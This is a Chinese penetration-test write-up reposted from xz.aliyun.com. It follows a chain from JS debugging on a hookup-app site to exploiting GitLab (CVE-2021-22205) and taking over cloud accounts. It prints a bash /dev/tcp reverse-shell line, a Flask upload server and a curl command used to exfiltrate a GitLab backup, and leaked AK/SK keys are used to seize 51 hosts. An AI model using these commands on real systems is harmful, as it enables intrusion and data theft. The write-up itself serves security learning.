记一次渗透中因为JS拿下整个云

首先给到一个资产是二维码，是一张色色图片里面带有约炮的 app 下载，扫码后得到如下结果 得到如下结果：https://www.target.com 后进行访问主站，注册成功后发现全是妹子，这个时候先别急，咱第一步先去看他调用的 JS 资源，随便点击一个资源然后刷新一下看他 F12 网络 这里首先我只能用当时留下的毫无关联的图片进行演示了，当时我看到的 JS 文件叫 MyProfile JS断点调试 这个凭借个人感觉就是个关键信息 (我的资料 -> 配置信息?) 所以凭借这些理由，我在 XHR 中锁定了 MyProfile 这个关键字进行 JS 断点 然后刷新进行调试 在漫长的调试过程中我发现在一个很奇怪的 JS文件 中调用了我的 MyProfile 字段 叫 /assets/index-xxxxxx.js 一般来说我就会去审计一下这个 JS文件，结果发现好东西了 bindgen: "git+http://123.123.123.123:1111/target2/a.git#0.0.14" 新突破 我当时就立刻去访问了一下，发现竟然是一个 Gitlab! 找了一下历史漏洞，直接 CVE-2021-22205 梭哈，成功拿到 shell 由于是执行命令，所以写了 shell 反弹 echo 'bash -i >& /dev/tcp/123.123.123.123/1111 0>&1' > /tmp/haha.shchmod +x /tmp/haha.sh/bin/bash /tmp/haha.sh 成功反弹 shell 发现是 ubunto 的 16.04 但是本地提权失败，找了 SUID 也没有办法，想尽了各种办法都没办法提权，打算放弃了，所以接下来就是去寻找 Git 权限能做的操作，找了一个下午，最终找到了 backups 目录里下找到了一个 backup 的 tar 包，应该八成就是 gitlab 上的备份了 Flask取文件 但是问题来了，我怎么做到在我反弹 shell 中把文件拖出来了呢？scp 等都试过了不行，于是乎我就写了个 flask 的上传页面让 shell 去 curl 一下把文件 post 上来 (感觉这思路骚的) 我的服务器 from flask import Flask,request import os app = Flask(__name__) @app.route('/upload',methods=['POST']) def upload_file():     file = request.files.get('file')    if file :        filename = file.filename        file.save(os.path.join(os.getcwd(),filename))        return f"File {filename} saved successfully"     else:        return "worry"          if  __name__ == '__main__':    app.run(host='0.0.0.0',debug=True,port=5000) 受控主机执行文件上传命令 curl -X POST http://123.123.123.123:1111/upload -F file=@./a.gitlab_backup.tar 云沦陷 几个G，下载漫长的很呢 拖到本地后应该就是 gitlab 的备份了，(因为他备份文件名字中带有 gitlab 的版本号)要用对应的 gitlab 的相应版本去搭建，然后本地搭建导入备份后慢慢的寻找一些有用信息，后面突然发现一个叫 application.yaml 的文件，进行审计后泄露了 ak 和 sk(这开发倒是备份挺明白的全部都写清清楚楚) 这个时候行云管家一把梭哈，因为权限很大，接管整个云了，总共是 51 台主机都拿下了 总结 思路就是：打点 -> JS文件断点调试 -> 新突破上shell -> 解决困难-> 发现新大陆(本地搭建) -> 接管云 最后全部打包好给了 GA，也进行取证 立A 了，到此因为一个 JS 文件拿下整个云结束了，思路可以学习一波。 文章作者：1201463046740633原文地址：https://xz.aliyun.com/t/12698 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END 微信扫一扫 关注该公众号